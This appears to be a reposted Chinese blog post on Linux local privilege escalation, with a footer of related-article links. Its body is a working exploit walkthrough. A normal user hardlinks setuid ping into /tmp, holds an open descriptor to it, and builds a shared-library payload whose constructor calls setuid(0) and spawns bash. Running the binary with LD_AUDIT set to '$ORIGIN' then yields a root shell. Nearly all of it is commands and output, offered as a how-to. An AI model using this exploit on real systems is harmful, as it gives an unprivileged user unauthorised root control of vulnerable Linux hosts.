首页 > 系统相关 >Linux 提权

Linux 提权

时间:2023-08-27 15:23:20浏览次数:40  
标签:tmp Linux 提权 exploit fd ahu test proc

普通用户提权

[test@ahu ~]$ whoami
test //登陆到普通用户,发现创建不了其他用户
[test@ahu ~]$ useradd aaa
-bash: /usr/sbin/useradd: Permission denied

进行身份变换
[test@ahu ~]$ mkdir /tmp/exploit
[test@ahu ~]$ ln /bin/ping /tmp/exploit/target
[test@ahu exploit]$ exec 3< /tmp/exploit/target
[test@ahu exploit]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target
[test@ahu exploit]$ rm -rf /tmp/exploit/
[test@ahu exploit]$ ls -l /proc/$$/fd/3
[test@ahu ~]$ vim payload.c
void __attribute__((constructor)) init() //在配置文件加入如下的内容
{
setuid(0);
system("/bin/bash");
}
~
[test@ahu ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@ahu ~]$ ls -l /tmp/exploit
[test@ahu ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@ahu ~]# whoami
root

 

标签:tmp,Linux,提权,exploit,fd,ahu,test,proc
From: https://www.cnblogs.com/huahuadebk/p/17660318.html

相关文章

  • Linux权限chmod
    在Linux中,我们具有3种类型的文件权限:读(r),写(w)和执行(x)权限。这些权限确定哪些用户可以读取,写入或执行文件。您可以使用文本或八进制(数字)表示法来分配这些权限,我们将在本教程后面讨论。文件和目录可以属于文件(u),组(g)或其他(o)的所有者u-所有人的权限g-所有组的权限o-其他......
  • Linux下安装Redis
    Linux安装Redis首先,在官网上下载安装包接着使用xftp上传安装包到home目录接着解压缩安装包到opt目录使用tar-zxvfredis-5.0.14(2).tar.gz命令解压解压完成接着我们安装C++的编译器yuminstallgcc-c++安装完成检查版本gcc-v接着执行make命令make执行完成之......
  • debian系Linux中文系统目录改为英文目录的解决方法
    debian系Linux中文系统目录改为英文目录的解决方法 之前给笔记本装的kali是英文版,系统安装好了后再修改系统语言为中文,或者直接就用英文系统,也是可以的。后来笔记本的硬盘坏掉了,换ssd,然后安装kali的中文版,中文是方便,但是进去后就不爽了。打开终端:➜kerker>ls-lh总用......
  • linux下vim命令详解
    高级一些的编辑器,都会包含宏功能,vim当然不能缺少了,在vim中使用宏是非常方便的::qx    开始记录宏,并将结果存入寄存器xq    退出记录模式@x    播放记录在x寄存器中的宏命令稍微解释一下,当在normal模式下输入:qx后,你对文本的所有编辑动作将会被记录下来,再次输入q即退......
  • Linux文件加密指南
    在工作和生活中为了安全考虑,通常会对一些重要文件进行加密备份或加密保存。在Linux中如何做到呢?本文将为你介绍在Linux中常见的加密文件的方法。01利用vim/vi加密优点:加密后,如果不知道密码,就看不到明文,包括root用户也看不了;缺点:很明显让别人知道加密了,容易让别人把加密的文件破......
  • 批量安装Linux系统之Cobbler构建
    一、cobbler简介cobbler是一款自动化操作系统安装的实现,与PXE安装系统的区别是可以同时部署多个版本的系统,而PXE只能选择一种系统。二、安装cobbler安装yum源yuminstallepel-release-yyuminstalldhcptftp-serverxinetdhttpdcobblercobbler-webpykickstartdebmirror-y......
  • 常用linux命令
    1.磁盘备份,将本地的/dev/hdx整盘备份到/dev/hdyddif=/dev/hdxof=/dev/hdy2.磁盘恢复,将备份文件恢复到指定盘ddif=/path/to/imageof=/dev/hdx3.备份MBR,备份磁盘开始的512Byte大小的MBR信息到指定文件ddif=/dev/hdxof=/path/to/imagecount=1bs=5124.回复MBRddif=/path/t......
  • 你的旧电脑是 “过时” 了,还是使用 Linux 的机会?
    导读很多时候,老旧的电脑往往被打上“过时”的标签。Linux 改变了这一现状。翻新旧电脑,让它重新为需要它的人所用。你可能经常听到有人说某个电脑、平板电脑或智能手机“过时了”。当你听到这样的说法时,花一分钟问问自己:“这个人说的是个人观点还是事实?”很多时候他......
  • 常用的linux命令
    《linux常用基础命令1.文件操作命令创建文件:touchfilename创建目录:mkdirdirName删除文件:rmfilename删除文件夹:rm-rfdirName文件复制:cp原始文件目标文件文件夹复制:cp-r原始目录目标目录文件移动:mvpath/sourceFileNamepath/targetFileName文件重命名:mvfil......
  • windows提权(上)
    只能搞个阉割版,不放工具了。我这里分开成两个部分传mimikatz读密码:privilege::debug//提升权限sekurlsa::logonpassWords//抓取密码xp不支持而已,win7可以laZagne.exe读取密码:linux,windows都支持选项:效果:laZagne.exeall>>1.txt#导出结果高版本2016,2012则可以读取hash,比如Pw......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99